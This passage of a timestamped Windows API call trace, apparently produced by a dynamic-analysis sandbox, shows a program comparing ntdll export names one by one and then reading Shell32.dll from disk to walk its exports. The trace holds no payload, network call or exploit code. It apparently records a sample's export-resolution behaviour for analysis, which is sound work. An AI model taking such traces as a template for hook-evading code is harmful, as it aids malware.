lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0279.578] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0279.578] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0279.578] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0279.578] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.578] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.578] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.579] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.579] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0279.579] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0279.579] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.579] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.579] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.579] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0279.579] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0279.579] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0279.579] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.580] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0279.581] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.581] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0279.582] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0279.582] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0279.582] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0279.582] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0279.582] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.582] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.582] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.582] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.583] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.584] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.584] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0279.584] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0279.584] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0279.584] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0279.584] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0279.584] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.584] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.585] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0279.585] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0279.585] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0279.585] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0279.585] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0279.585] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0279.585] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0279.585] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0279.585] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0279.585] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0279.585] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.585] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.585] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.585] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.585] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0279.585] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.586] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0279.587] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0279.587] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0279.587] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0279.587] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0279.587] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.587] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.587] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.587] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.587] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0279.587] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0279.588] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0279.588] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0279.588] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0279.588] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0279.588] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0279.588] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0279.588] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0279.588] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0279.588] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0282.826] GetProcessHeap () returned 0x540000 [0282.826] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x4107040 | out: hHeap=0x540000) returned 1 [0282.839] GetProcessHeap () returned 0x540000 [0282.839] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559020 [0282.839] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0282.840] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0282.840] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0282.840] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0282.841] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0282.842] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0282.842] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0282.842] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0282.842] GetProcessHeap () returned 0x540000 [0282.842] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1587258) returned 0x410c040 [0283.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0283.244] ReadFile (in: hFile=0x140, lpBuffer=0x410c040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x410c040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0288.459] CloseHandle (hObject=0x140) returned 1 [0288.460] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0288.460] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0288.460] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0288.460] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0288.460] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0288.461] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0288.461] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0288.461] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0288.461] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.461] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0288.461] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0288.461] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0288.461] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.461] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0288.461] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0288.461] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0288.461] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0288.461] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.461] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0288.461] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.461] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0288.461] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0288.462] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0288.462] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.462] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0288.462] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0288.462] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.462] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0288.462] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0288.462] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0288.462] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.462] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0288.462] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.462] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.462] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0288.462] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0288.462] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0288.462] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0288.462] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.462] lstrcmpA (lpString1="Control_RunDLL", 